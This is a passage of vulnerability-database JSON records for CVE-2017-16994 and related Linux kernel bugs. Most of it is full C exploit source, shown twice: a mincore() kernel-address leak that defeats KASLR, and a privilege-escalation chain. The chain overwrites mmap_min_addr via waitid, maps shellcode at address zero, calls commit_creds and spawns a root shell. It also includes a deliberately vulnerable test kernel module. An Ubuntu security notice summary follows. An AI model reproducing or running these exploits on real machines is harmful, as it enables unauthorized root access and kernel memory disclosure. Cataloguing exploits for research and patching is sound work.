(mmap((void*)0x66000000, 0x20000000000, PROT_NONE, MAP_SHARED | MAP_ANONYMOUS | MAP_HUGETLB | MAP_NORESERVE, -1, 0) == MAP_FAILED)\r\n err(1, \"mmap\");\r\n \r\n while(right){\r\n /* Touch a mishandle with this type mapping */\r\n if (mincore((void*)0x86000000, 0x1000000, buf))\r\n perror(\"mincore\");\r\n for( int n=0; n<getpagesize()/sizeof(unsigned char); n++) {\r\n addr = *(unsigned long*)(&buf[n]);\r\n /* Kernel address space, may need some mask&offset */\r\n if(addr > 0xffffffff00000000){\r\n right = 0;\r\n goto out;\r\n }\r\n }\r\n }\r\n out:\r\n printf(\"%p\\n\", addr);\r\n return 0;\r\n}\n\n# 0day.today [2018-04-04] #", "sourceHref": "https://0day.today/exploit/30016", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-04-04T19:33:01", "description": "Exploit for linux platform in category local exploits", "edition": 1, "published": "2018-03-20T00:00:00", "title": "Linux Kernel 4.13 (Debian 9) - Local Privilege Escalation Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-16994"], "modified": "2018-03-20T00:00:00", "href": "https://0day.today/exploit/description/30015", "id": "1337DAY-ID-30015", "sourceData": "/** disable_map_min_add.c **/\r\n/*\r\n *\r\n */\r\n \r\n#include <stdio.h>\r\n#include <sys/types.h>\r\n#include <sys/wait.h>\r\n#include <unistd.h>\r\n#include <stdlib.h>\r\n#include <sys/resource.h>\r\n#include <syscall.h>\r\n \r\n/* offsets might differ, kernel was custom compiled\r\n * you can read vmlinux and caculate the offset when testing\r\n */\r\n \r\n/*\r\n#define OFFSET_KERNEL_BASE 0x000000\r\n */\r\n#define MMAP_MIN_ADDR 0x1101de8\r\n#define DAC_MMAP_MIN_ADDR 0xe8e810\r\n \r\n/* get kernel functions address by reading /proc/kallsyms */\r\nunsigned long get_kernel_sym(char *name)\r\n{\r\n FILE *f;\r\n unsigned long addr;\r\n char dummy;\r\n char sname[256];\r\n int ret = 0;\r\n \r\n f = fopen(\"/proc/kallsyms\", \"r\");\r\n if (f == NULL) {\r\n printf(\"[-] Failed to open /proc/kallsyms\\n\");\r\n exit(-1);\r\n }\r\n printf(\"[+] Find %s...\\n\", name);\r\n while(ret != EOF) {\r\n ret = fscanf(f, \"%p %c %s\\n\", (void **)&addr, &dummy, sname);\r\n if (ret == 0) {\r\n fscanf(f, \"%s\\n\", sname);\r\n continue;\r\n }\r\n if (!strcmp(name, sname)) {\r\n fclose(f);\r\n printf(\"[+] Found %s at %lx\\n\", name, addr);\r\n return addr;\r\n }\r\n }\r\n fclose(f);\r\n return 0;\r\n}\r\n \r\nint main(void)\r\n{\r\n int pid, pid2, pid3;\r\n struct rusage rusage = { };\r\n unsigned long *p, *kernel_base;\r\n char *mmap_min_addr, *dac_mmap_min_addr;\r\n pid = fork();\r\n if (pid > 0) {\r\n /* try to bypass kaslr when /proc/kallsyms isn't readable */\r\n syscall(__NR_waitid, P_PID, pid, NULL, WEXITED|WNOHANG|__WNOTHREAD, &rusage);\r\n printf(\"[+] Leak size=%d bytes\\n\", sizeof(rusage));\r\n for (p = (unsigned long *)&rusage;\r\n p < (unsigned long *)((char *)&rusage + sizeof(rusage));\r\n p++) {\r\n printf(\"[+] Leak point: %p\\n\", p);\r\n if (*p > 0xffffffff00000000 && *p < 0xffffffffff000000) {\r\n p = (unsigned long *)(*p&0xffffffffff000000 /*+ OFFSET_TO_BASE*/); // spender's wouldn't actually work when KASLR was enabled\r\n break;\r\n }\r\n }\r\n if(p < (unsigned long *)0xffffffff00000000 || p > (unsigned long *)0xffffffffff000000)\r\n exit(-1);\r\n } else if (pid == 0) {\r\n sleep(1);\r\n exit(0);\r\n }\r\n \r\n kernel_base = get_kernel_sym(\"startup_64\");\r\n printf(\"[+] Got kernel base: %p\\n\", kernel_base);\r\n mmap_min_addr = (char *)kernel_base + MMAP_MIN_ADDR;\r\n printf(\"[+] Got mmap_min_addr: %p\\n\", mmap_min_addr);\r\n dac_mmap_min_addr = (char *)kernel_base + DAC_MMAP_MIN_ADDR;\r\n printf(\"[+] Got dac_mmap_min_addr: %p\\n\", dac_mmap_min_addr);\r\n \r\n pid2 = fork();\r\n if (pid2 > 0) {\r\n printf(\"[+] Overwriting map_min_addr...\\n\");\r\n if (syscall(__NR_waitid, P_PID, pid, (siginfo_t *)(mmap_min_addr - 2), WEXITED|WNOHANG|__WNOTHREAD, NULL) < 0) {\r\n printf(\"[-] Failed!\\n\");\r\n exit(1);\r\n }\r\n } else if (pid2 == 0) {\r\n sleep(1);\r\n exit(0);\r\n }\r\n \r\n pid3 = fork();\r\n if (pid3 > 0) {\r\n printf(\"[+] Overwriting dac_mmap_min_addr...\\n\");\r\n if (syscall(__NR_waitid, P_PID, pid, (siginfo_t *)(dac_mmap_min_addr - 2), WEXITED|WNOHANG|__WNOTHREAD, NULL) < 0) {\r\n printf(\"[-] Failed!\\n\");\r\n exit(1);\r\n }\r\n printf(\"[+] map_min_addr disabled!\\n\");\r\n exit(0);\r\n } else if (pid3 == 0) {\r\n sleep(1);\r\n exit(0);\r\n }\r\n return 0;\r\n}\r\n/** disable_map_min_add.c EOF **/\r\n \r\n/** null_poiter_exploit.c **/\r\n \r\n#define _GNU_SOURCE\r\n \r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <sys/types.h>\r\n#include <sys/wait.h>\r\n#include <sys/mman.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n#include <unistd.h>\r\n#include <fcntl.h>\r\n \r\nstruct cred;\r\nstruct task_struct;\r\n \r\ntypedef struct cred *(*prepare_kernel_cred_t) (struct task_struct *daemon) __attribute__((regparm(3)));\r\ntypedef int (*commit_creds_t) (struct cred *new) __attribute__((regparm(3)));\r\n \r\nprepare_kernel_cred_t prepare_kernel_cred;\r\ncommit_creds_t commit_creds;\r\n \r\n/* a kernel null pointer derefence will help get privilege\r\n * /proc/test is a kernel-load module create for testing\r\n * touch_null_kp can be replace your own implement to\r\n * touch a kernel null ponit\r\n */\r\nvoid touch_null_kp() {\r\n printf(\"[+]Start touch kernel null point\\n\");\r\n \r\n int *f = open(\"/proc/test\", O_RDONLY);\r\n read(f, NULL, 0);\r\n}\r\n \r\n/* run shell after root */\r\nvoid get_shell() {\r\n char *argv[] = {\"/bin/sh\", NULL};\r\n \r\n if (getuid() == 0){\r\n printf(\"[+] Root shell success !! :)\\n\");\r\n execve(\"/bin/sh\", argv, NULL);\r\n }\r\n printf(\"[-] failed to get root shell :(\\n\");\r\n}\r\n \r\n/* use for privilige escalation */\r\nvoid get_root() {\r\n commit_creds(prepare_kernel_cred(0));\r\n}\r\n \r\n/* get function address by reading /proc/kallsyms */\r\nunsigned long get_kernel_sym(char *name)\r\n{\r\n FILE *f;\r\n unsigned long addr;\r\n char dummy;\r\n char sname[256];\r\n int ret = 0;\r\n \r\n f = fopen(\"/proc/kallsyms\", \"r\");\r\n if (f == NULL) {\r\n printf(\"[-] Failed to open /proc/kallsyms\\n\");\r\n exit(-1);\r\n }\r\n printf(\"[+] Find %s...\\n\", name);\r\n while(ret != EOF) {\r\n ret = fscanf(f, \"%p %c %s\\n\", (void **)&addr, &dummy, sname);\r\n if (ret == 0) {\r\n fscanf(f, \"%s\\n\", sname);\r\n continue;\r\n }\r\n if (!strcmp(name, sname)) {\r\n fclose(f);\r\n printf(\"[+] Found %s at %lx\\n\", name, addr);\r\n return addr;\r\n }\r\n }\r\n fclose(f);\r\n return 0;\r\n}\r\n \r\nint main(int ac, char **av)\r\n{\r\n \r\n /* get function address */\r\n prepare_kernel_cred = (prepare_kernel_cred_t)get_kernel_sym(\"prepare_kernel_cred\");\r\n commit_creds = (commit_creds_t)get_kernel_sym(\"commit_creds\");\r\n printf(\"Got commit_creds:%p,prepare_kernel_cred%p\\n\", commit_creds, prepare_kernel_cred);\r\n \r\n /* allocate memory loacate in 0x00 */\r\n printf(\"[+] Try to allocat 0x00000000...\\n\");\r\n if (mmap(0, 4096, PROT_READ|PROT_WRITE|PROT_EXEC,MAP_ANON|MAP_PRIVATE|MAP_FIXED, -1, 0) == (char *)-1){\r\n printf(\"[-] Failed to allocat 0x00000000\\n\");\r\n return -1;\r\n }\r\n printf(\"[+] Allocation success !\\n\");\r\n /* memset(0, 0xcc, 4096); */\r\n /*\r\n //movq rax, 0xffffffff81f3f45a\r\n //movq [rax], 0\r\n // it is not nessecc\r\n mov rax, 0x4242424242424242\r\n call rax\r\n xor rax, rax\r\n ret\r\n replace 0x4242424242424242 by get_root\r\n https://defuse.ca/online-x86-assembler.htm#disassembly\r\n */\r\n \r\n unsigned char shellcode[] = \r\n { /*0x48, 0xC7, 0xC0, 0x5A, 0xF4, 0xF3, 0x81, *//*0x48, 0xC7, 0x00, 0x00, 0x00, 0x00, 0x00,*/ 0x48, 0xB8, 0x42, 0x42, 0x42, 0x42, 0x42, 0x42, 0x42, 0x42, 0xFF, 0xD0, 0x48, 0x31, 0xC0, 0xC3 };\r\n /* insert the getroot address to shellcode */\r\n void **get_root_offset = rawmemchr(shellcode, 0x42);\r\n (*get_root_offset) = get_root;\r\n /* map shellcode to 0x00 */\r\n memcpy(0, shellcode, sizeof(shellcode));\r\n \r\n /* jmp to 0x00 */\r\n touch_null_kp();\r\n \r\n get_shell();\r\n \r\n}\r\n \r\n/** null_poiter_exploit.c EOF **/\r\n \r\n/** test.c **/\r\n#include <linux/init.h>\r\n#include <linux/module.h>\r\n#include <linux/proc_fs.h>\r\n#include <linux/uaccess.h>\r\n#include <linux/slab.h>\r\n#include <asm/ptrace.h>\r\n#include <asm/thread_info.h>\r\n \r\n#define MY_DEV_NAME \"test\"\r\n#define DEBUG_FLAG \"PROC_DEV\"\r\n \r\nextern unsigned long proc_test_sp_print;\r\nstatic ssize_t proc_read (struct file *proc_file, char __user *proc_user, size_t n, loff_t *loff);\r\nstatic ssize_t proc_write (struct file *proc_file, const char __user *proc_user, size_t n, loff_t *loff);\r\nstatic int proc_open (struct inode *proc_inode, struct file *proc_file);\r\nstatic struct file_operations a = {\r\n .open = proc_open,\r\n .read = proc_read,\r\n .write = proc_write,\r\n};\r\n \r\n \r\nstatic int __init mod_init(void)\r\n{\r\n struct proc_dir_entry *test_entry;\r\n const struct file_operations *proc_fops = &a;\r\n printk(DEBUG_FLAG\":proc init start\\n\");\r\n \r\n test_entry = proc_create(MY_DEV_NAME, S_IRUGO|S_IWUGO, NULL, proc_fops);\r\n if(!test_entry)\r\n printk(DEBUG_FLAG\":there is somethings wrong!\\n\");\r\n \r\n printk(DEBUG_FLAG\":proc init over!\\n\");\r\n return 0;\r\n}\r\n \r\nstatic ssize_t proc_read (struct file *proc_file, char *proc_user, size_t n, loff_t *loff)\r\n{\r\n void (*fun)(void);\r\n fun = NULL;\r\n //printk(\"%s:thread.sp0: %p, task->stack: %p\\n\", \"PROC\", current->thread.sp0, current->stack);\r\n fun();\r\n //printk(\"The memory of %p : %d\\n\", proc_user, *proc_user);\r\n return 0;\r\n}\r\n \r\nstatic ssize_t proc_write (struct file *proc_file, const char __user *proc_user, size_t n, loff_t *loff)\r\n{\r\n printk(\"%s:thread.sp0: %p, task->stack: %p\\n\", \"PROC\", current->thread.sp0, current->stack);\r\n return 0;\r\n}\r\n \r\nint proc_open (struct inode *proc_inode, struct file *proc_file)\r\n{\r\n printk(DEBUG_FLAG\":into open, cmdline:%s!\\n\", current->comm);\r\n printk(\"%s:thread.sp0: %p, task->stack: %p\\n\", \"PROC\", current->thread.sp0, current->stack);\r\n return 0;\r\n}\r\n \r\nmodule_init(mod_init);\r\n/** test.c EOF **/\n\n# 0day.today [2018-04-04] #", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://0day.today/exploit/30015"}], "exploitdb": [{"lastseen": "2018-05-24T14:08:22", "description": "Linux Kernel - 'mincore()' Heap Page Disclosure (PoC). CVE-2017-16994. Dos exploit for Linux platform", "published": "2017-12-11T00:00:00", "type": "exploitdb", "title": "Linux Kernel - 'mincore()' Heap Page Disclosure (PoC)", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-16994"], "modified": "2017-12-11T00:00:00", "id": "EDB-ID:44304", "href": "https://www.exploit-db.com/exploits/44304/", "sourceData": "/*\r\n * The source is modified from \r\n * https://bugs.chromium.org/p/project-zero/issues/detail?id=1431\r\n * I try to find out infomation useful from the infoleak\r\n * The kernel address can be easily found out from the uninitialized memory\r\n * leaked from kernel, which can help bypass kaslr\r\n */\r\n\r\n#define _GNU_SOURCE\r\n#include <unistd.h>\r\n#include <sys/mman.h>\r\n#include <err.h>\r\n#include <stdio.h>\r\n\r\nint main(void) {\r\n unsigned char buf[getpagesize()/sizeof(unsigned char)];\r\n int right = 1;\r\n unsigned long addr = 0;\r\n \r\n /* A MAP_ANONYMOUS | MAP_HUGETLB mapping */\r\n if (mmap((void*)0x66000000, 0x20000000000, PROT_NONE, MAP_SHARED | MAP_ANONYMOUS | MAP_HUGETLB | MAP_NORESERVE, -1, 0) == MAP_FAILED)\r\n err(1, \"mmap\");\r\n\r\n while(right){\r\n /* Touch a mishandle with this type mapping */\r\n if (mincore((void*)0x86000000, 0x1000000, buf))\r\n perror(\"mincore\");\r\n for( int n=0; n<getpagesize()/sizeof(unsigned char); n++) {\r\n addr = *(unsigned long*)(&buf[n]);\r\n /* Kernel address space, may need some mask&offset */\r\n if(addr > 0xffffffff00000000){\r\n\tright = 0;\r\n\tgoto out;\r\n }\r\n }\r\n }\r\n out:\r\n printf(\"%p\\n\", addr);\r\n return 0;\r\n}", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/44304/"}, {"lastseen": "2018-05-24T14:08:19", "description": "Linux Kernel 4.13 (Debian 9) - Local Privilege Escalation. CVE-2017-16994. Local exploit for Linux platform", "published": "2017-12-11T00:00:00", "type": "exploitdb", "title": "Linux Kernel 4.13 (Debian 9) - Local Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-5123", "CVE-2017-16994"], "modified": "2017-12-11T00:00:00", "id": "EDB-ID:44303", "href": "https://www.exploit-db.com/exploits/44303/", "sourceData": "/** disable_map_min_add.c **/\r\n/*\r\n *\r\n */\r\n\r\n#include <stdio.h>\r\n#include <sys/types.h>\r\n#include <sys/wait.h>\r\n#include <unistd.h>\r\n#include <stdlib.h>\r\n#include <sys/resource.h>\r\n#include <syscall.h>\r\n\r\n/* offsets might differ, kernel was custom compiled\r\n * you can read vmlinux and caculate the offset when testing\r\n */\r\n\r\n/*\r\n#define OFFSET_KERNEL_BASE 0x000000\r\n */\r\n#define MMAP_MIN_ADDR 0x1101de8\r\n#define DAC_MMAP_MIN_ADDR 0xe8e810\r\n\r\n/* get kernel functions address by reading /proc/kallsyms */\r\nunsigned long get_kernel_sym(char *name)\r\n{\r\n FILE *f;\r\n unsigned long addr;\r\n char dummy;\r\n char sname[256];\r\n int ret = 0;\r\n\r\n f = fopen(\"/proc/kallsyms\", \"r\");\r\n if (f == NULL) {\r\n printf(\"[-] Failed to open /proc/kallsyms\\n\");\r\n exit(-1);\r\n }\r\n printf(\"[+] Find %s...\\n\", name);\r\n while(ret != EOF) {\r\n ret = fscanf(f, \"%p %c %s\\n\", (void **)&addr, &dummy, sname);\r\n if (ret == 0) {\r\n fscanf(f, \"%s\\n\", sname);\r\n continue;\r\n }\r\n if (!strcmp(name, sname)) {\r\n fclose(f);\r\n printf(\"[+] Found %s at %lx\\n\", name, addr);\r\n return addr;\r\n }\r\n }\r\n fclose(f);\r\n return 0;\r\n}\r\n\r\nint main(void)\r\n{\r\n int pid, pid2, pid3;\r\n struct rusage rusage = { };\r\n unsigned long *p, *kernel_base;\r\n char *mmap_min_addr, *dac_mmap_min_addr;\r\n pid = fork();\r\n if (pid > 0) {\r\n /* try to bypass kaslr when /proc/kallsyms isn't readable */\r\n syscall(__NR_waitid, P_PID, pid, NULL, WEXITED|WNOHANG|__WNOTHREAD, &rusage);\r\n printf(\"[+] Leak size=%d bytes\\n\", sizeof(rusage));\r\n for (p = (unsigned long *)&rusage;\r\n\t p < (unsigned long *)((char *)&rusage + sizeof(rusage));\r\n\t p++) {\r\n printf(\"[+] Leak point: %p\\n\", p);\r\n if (*p > 0xffffffff00000000 && *p < 0xffffffffff000000) {\r\n\tp = (unsigned long *)(*p&0xffffffffff000000 /*+ OFFSET_TO_BASE*/); // spender's wouldn't actually work when KASLR was enabled\r\n\tbreak;\r\n }\r\n }\r\n if(p < (unsigned long *)0xffffffff00000000 || p > (unsigned long *)0xffffffffff000000)\r\n exit(-1);\r\n } else if (pid == 0) {\r\n sleep(1);\r\n exit(0);\r\n }\r\n\r\n kernel_base = get_kernel_sym(\"startup_64\");\r\n printf(\"[+] Got kernel base: %p\\n\", kernel_base);\r\n mmap_min_addr = (char *)kernel_base + MMAP_MIN_ADDR;\r\n printf(\"[+] Got mmap_min_addr: %p\\n\", mmap_min_addr);\r\n dac_mmap_min_addr = (char *)kernel_base + DAC_MMAP_MIN_ADDR;\r\n printf(\"[+] Got dac_mmap_min_addr: %p\\n\", dac_mmap_min_addr);\r\n \r\n pid2 = fork();\r\n if (pid2 > 0) {\r\n printf(\"[+] Overwriting map_min_addr...\\n\");\r\n if (syscall(__NR_waitid, P_PID, pid, (siginfo_t *)(mmap_min_addr - 2), WEXITED|WNOHANG|__WNOTHREAD, NULL) < 0) {\r\n printf(\"[-] Failed!\\n\");\r\n exit(1);\r\n }\r\n } else if (pid2 == 0) {\r\n sleep(1);\r\n exit(0);\r\n }\r\n \r\n pid3 = fork();\r\n if (pid3 > 0) {\r\n printf(\"[+] Overwriting dac_mmap_min_addr...\\n\");\r\n if (syscall(__NR_waitid, P_PID, pid, (siginfo_t *)(dac_mmap_min_addr - 2), WEXITED|WNOHANG|__WNOTHREAD, NULL) < 0) {\r\n printf(\"[-] Failed!\\n\");\r\n exit(1);\r\n }\r\n printf(\"[+] map_min_addr disabled!\\n\");\r\n exit(0);\r\n } else if (pid3 == 0) {\r\n sleep(1);\r\n exit(0);\r\n }\r\n return 0;\r\n}\r\n/** disable_map_min_add.c EOF **/\r\n\r\n/** null_poiter_exploit.c **/\r\n\r\n#define _GNU_SOURCE\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <sys/types.h>\r\n#include <sys/wait.h>\r\n#include <sys/mman.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n#include <unistd.h>\r\n#include <fcntl.h>\r\n\r\nstruct cred;\r\nstruct task_struct;\r\n\r\ntypedef struct cred *(*prepare_kernel_cred_t) (struct task_struct *daemon) __attribute__((regparm(3)));\r\ntypedef int (*commit_creds_t) (struct cred *new) __attribute__((regparm(3)));\r\n\r\nprepare_kernel_cred_t prepare_kernel_cred;\r\ncommit_creds_t commit_creds;\r\n\r\n/* a kernel null pointer derefence will help get privilege\r\n * /proc/test is a kernel-load module create for testing\r\n * touch_null_kp can be replace your own implement to\r\n * touch a kernel null ponit\r\n */\r\nvoid touch_null_kp() {\r\n printf(\"[+]Start touch kernel null point\\n\");\r\n\r\n int *f = open(\"/proc/test\", O_RDONLY);\r\n read(f, NULL, 0);\r\n}\r\n\r\n/* run shell after root */\r\nvoid get_shell() {\r\n char *argv[] = {\"/bin/sh\", NULL};\r\n\r\n if (getuid() == 0){\r\n printf(\"[+] Root shell success !! :)\\n\");\r\n execve(\"/bin/sh\", argv, NULL);\r\n }\r\n printf(\"[-] failed to get root shell :(\\n\");\r\n}\r\n\r\n/* use for privilige escalation */\r\nvoid get_root() {\r\n commit_creds(prepare_kernel_cred(0));\r\n}\r\n\r\n/* get function address by reading /proc/kallsyms */\r\nunsigned long get_kernel_sym(char *name)\r\n{\r\n FILE *f;\r\n unsigned long addr;\r\n char dummy;\r\n char sname[256];\r\n int ret = 0;\r\n\r\n f = fopen(\"/proc/kallsyms\", \"r\");\r\n if (f == NULL) {\r\n printf(\"[-] Failed to open /proc/kallsyms\\n\");\r\n exit(-1);\r\n }\r\n printf(\"[+] Find %s...\\n\", name);\r\n while(ret != EOF) {\r\n ret = fscanf(f, \"%p %c %s\\n\", (void **)&addr, &dummy, sname);\r\n if (ret == 0) {\r\n fscanf(f, \"%s\\n\", sname);\r\n continue;\r\n }\r\n if (!strcmp(name, sname)) {\r\n fclose(f);\r\n printf(\"[+] Found %s at %lx\\n\", name, addr);\r\n return addr;\r\n }\r\n }\r\n fclose(f);\r\n return 0;\r\n}\r\n\r\nint main(int ac, char **av)\r\n{\r\n\r\n /* get function address */\r\n prepare_kernel_cred = (prepare_kernel_cred_t)get_kernel_sym(\"prepare_kernel_cred\");\r\n commit_creds = (commit_creds_t)get_kernel_sym(\"commit_creds\");\r\n printf(\"Got commit_creds:%p,prepare_kernel_cred%p\\n\", commit_creds, prepare_kernel_cred);\r\n\r\n /* allocate memory loacate in 0x00 */\r\n printf(\"[+] Try to allocat 0x00000000...\\n\");\r\n if (mmap(0, 4096, PROT_READ|PROT_WRITE|PROT_EXEC,MAP_ANON|MAP_PRIVATE|MAP_FIXED, -1, 0) == (char *)-1){\r\n printf(\"[-] Failed to allocat 0x00000000\\n\");\r\n return -1;\r\n }\r\n printf(\"[+] Allocation success !\\n\");\r\n /* memset(0, 0xcc, 4096); */\r\n /*\r\n //movq rax, 0xffffffff81f3f45a\r\n //movq [rax], 0\r\n // it is not nessecc\r\n mov rax, 0x4242424242424242\r\n call rax\r\n xor rax, rax\r\n ret\r\n replace 0x4242424242424242 by get_root\r\n https://defuse.ca/online-x86-assembler.htm#disassembly\r\n */\r\n\r\n unsigned char shellcode[] = \r\n { /*0x48, 0xC7, 0xC0, 0x5A, 0xF4, 0xF3, 0x81, *//*0x48, 0xC7, 0x00, 0x00, 0x00, 0x00, 0x00,*/ 0x48, 0xB8, 0x42, 0x42, 0x42, 0x42, 0x42, 0x42, 0x42, 0x42, 0xFF, 0xD0, 0x48, 0x31, 0xC0, 0xC3 };\r\n /* insert the getroot address to shellcode */\r\n void **get_root_offset = rawmemchr(shellcode, 0x42);\r\n (*get_root_offset) = get_root;\r\n /* map shellcode to 0x00 */\r\n memcpy(0, shellcode, sizeof(shellcode));\r\n\r\n /* jmp to 0x00 */\r\n touch_null_kp();\r\n\r\n get_shell();\r\n\r\n}\r\n\r\n/** null_poiter_exploit.c EOF **/\r\n\r\n/** test.c **/\r\n#include <linux/init.h>\r\n#include <linux/module.h>\r\n#include <linux/proc_fs.h>\r\n#include <linux/uaccess.h>\r\n#include <linux/slab.h>\r\n#include <asm/ptrace.h>\r\n#include <asm/thread_info.h>\r\n\r\n#define MY_DEV_NAME \"test\"\r\n#define DEBUG_FLAG \"PROC_DEV\"\r\n\r\nextern unsigned long proc_test_sp_print;\r\nstatic ssize_t proc_read (struct file *proc_file, char __user *proc_user, size_t n, loff_t *loff);\r\nstatic ssize_t proc_write (struct file *proc_file, const char __user *proc_user, size_t n, loff_t *loff);\r\nstatic int proc_open (struct inode *proc_inode, struct file *proc_file);\r\nstatic struct file_operations a = {\r\n .open = proc_open,\r\n .read = proc_read,\r\n .write = proc_write,\r\n};\r\n\r\n\r\nstatic int __init mod_init(void)\r\n{\r\n struct proc_dir_entry *test_entry;\r\n const struct file_operations *proc_fops = &a;\r\n printk(DEBUG_FLAG\":proc init start\\n\");\r\n\r\n test_entry = proc_create(MY_DEV_NAME, S_IRUGO|S_IWUGO, NULL, proc_fops);\r\n if(!test_entry)\r\n printk(DEBUG_FLAG\":there is somethings wrong!\\n\");\r\n\r\n printk(DEBUG_FLAG\":proc init over!\\n\");\r\n return 0;\r\n}\r\n\r\nstatic ssize_t proc_read (struct file *proc_file, char *proc_user, size_t n, loff_t *loff)\r\n{\r\n void (*fun)(void);\r\n fun = NULL;\r\n //printk(\"%s:thread.sp0: %p, task->stack: %p\\n\", \"PROC\", current->thread.sp0, current->stack);\r\n fun();\r\n //printk(\"The memory of %p : %d\\n\", proc_user, *proc_user);\r\n return 0;\r\n}\r\n\r\nstatic ssize_t proc_write (struct file *proc_file, const char __user *proc_user, size_t n, loff_t *loff)\r\n{\r\n printk(\"%s:thread.sp0: %p, task->stack: %p\\n\", \"PROC\", current->thread.sp0, current->stack);\r\n return 0;\r\n}\r\n\r\nint proc_open (struct inode *proc_inode, struct file *proc_file)\r\n{\r\n printk(DEBUG_FLAG\":into open, cmdline:%s!\\n\", current->comm);\r\n printk(\"%s:thread.sp0: %p, task->stack: %p\\n\", \"PROC\", current->thread.sp0, current->stack);\r\n return 0;\r\n}\r\n\r\nmodule_init(mod_init);\r\n/** test.c EOF **/", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/44303/"}], "ubuntu": [{"lastseen": "2020-07-09T00:23:05", "bulletinFamily": "unix", "cvelist": ["CVE-2017-17450", "CVE-2018-5333", "CVE-2017-17741", "CVE-2017-0861", "CVE-2017-17805", "CVE-2017-16532", "CVE-2017-16649", "CVE-2018-5344", "CVE-2017-16537", "CVE-2017-18204", "CVE-2017-15129", "CVE-2017-16994", "CVE-2017-17448", "CVE-2017-16646", "CVE-2017-16647", "CVE-2018-5332", "CVE-2017-16650", "CVE-2017-17807", "CVE-2018-1000026", "CVE-2017-16645", "CVE-2017-17806"], "description": "It was discovered that a race condition leading to a use-after-free \nvulnerability existed in the ALSA PCM subsystem of the Linux kernel. A \nlocal attacker could use this to cause a denial of service (system crash) \nor possibly execute arbitrary code. (CVE-2017-0861)\n\nIt was discovered that a use-after-free vulnerability existed in the \nnetwork namespaces implementation in the Linux kernel. A local attacker \ncould use this to cause a denial of service (system crash) or possibly \nexecute arbitrary code. (CVE-2017-15129)\n\nAndrey Konovalov discovered that the usbtest device driver in the Linux \nkernel did not properly validate endpoint metadata. A physically proximate \nattacker could use this to cause a denial of service (system crash). \n(CVE-2017-16532)\n\nAndrey Konovalov discovered that the SoundGraph iMON USB driver in the \nLinux kernel did not properly validate device metadata. A physically \nproximate attacker could use this to cause a denial of service (system \ncrash). (CVE-2017-16537)\n\nAndrey Konovalov discovered that the IMS Passenger Control Unit USB driver \nin the Linux kernel did not properly validate device descriptors. A \nphysically proximate attacker could use this to cause a denial of service \n(system crash). (CVE-2017-16645)\n\nAndrey Konovalov discovered that the DiBcom DiB0700 USB DVB driver in the \nLinux kernel did not properly handle detach events. A physically proximate \nattacker could use this to cause a denial of service (system crash). \n(CVE-2017-16646)\n\nAndrey Konovalov discovered that the ASIX Ethernet USB driver in the Linux \nkernel did not properly handle suspend and resume events. A physically \nproximate attacker could use this to cause a denial of service (system \ncrash). (CVE-2017-16647)\n\nAndrey Konovalov discovered that the CDC USB Ethernet driver did not \nproperly validate device descriptors. A physically proximate attacker could \nuse this to cause a denial of service (system crash). (CVE-2017-16649)\n\nAndrey Konovalov discovered that the QMI WWAN USB driver did not properly \nvalidate device descriptors. A physically proximate attacker could use this \nto cause a denial of service (system crash). (CVE-2017-16650)\n\nIt was discovered that the HugeTLB component of the Linux kernel did not \nproperly handle holes in hugetlb ranges. A local attacker could use this to \nexpose sensitive information (kernel memory). (CVE-2017-16994)\n\nIt was discovered that the netfilter component of the Linux did not \nproperly restrict access to the connection tracking helpers list. A local \nattacker could use this to bypass intended access restrictions. \n(CVE-2017-17448)\n\nIt was discovered that the netfilter passive OS fingerprinting (xt_osf) \nmodule did not properly perform access control checks. A local attacker \ncould improperly modify the system-wide OS fingerprint list. \n(CVE-2017-17450)\n\nDmitry Vyukov discovered that the KVM implementation in the Linux kernel \ncontained an out-of-bounds read when handling memory-mapped I/O. A local \nattacker could use this to expose sensitive information. (CVE-2017-17741)\n\nIt was discovered that the Salsa20 encryption algorithm implementations in \nthe Linux kernel did not properly handle zero-length inputs. A local \nattacker could use this to cause a denial of service (system crash). \n(CVE-2017-17805)\n\nIt was discovered that the HMAC implementation did not validate the state \nof the underlying cryptographic hash algorithm. A local attacker could use \nthis to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2017-17806)\n\nIt was discovered that the keyring implementation in the Linux kernel did \nnot properly check permissions when a key request was performed on a task's \ndefault keyring. A local attacker could use this to add keys to \nunauthorized keyrings. (CVE-2017-17807)\n\nIt was discovered that a race condition existed in the OCFS2 file system \nimplementation in the Linux kernel. A local attacker could use this to \ncause a denial of service (kernel deadlock). (CVE-2017-18204)\n\nIt was discovered that the Broadcom NetXtremeII ethernet driver in the \nLinux kernel did not properly validate Generic Segment Offload (GSO) packet \nsizes. An attacker could use this to cause a denial of service (interface \nunavailability). (CVE-2018-1000026)\n\nIt was discovered that the Reliable Datagram Socket (RDS) implementation in \nthe Linux kernel contained an out-of-bounds write during RDMA page allocation. An \nattacker could use this to cause a denial of service (system crash) or \npossibly execute arbitrary code. (CVE-2018-5332)\n\nMohamed Ghannam discovered a null pointer dereference in the RDS (Reliable \nDatagram Sockets) protocol implementation of the Linux kernel. A local \nattacker could use this to cause a denial of service (system crash). \n(CVE-2018-5333)\n\n\u8303\u9f99\u98de discovered that a race condition existed in loop block device \nimplementation in the Linux kernel. A local attacker could use this to \ncause a denial of service (system crash) or possibly execute arbitrary \ncode. (CVE-2018-5344)", "edition": 5, "modified": "2018-04-04T00:00:00", "published": "2018-04-04T00:00:00", "id": "USN-3617-3", "href": "https://ubuntu.com/security/notices/USN-3617-3", "title": "Linux kernel (Raspberry Pi 2) vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": 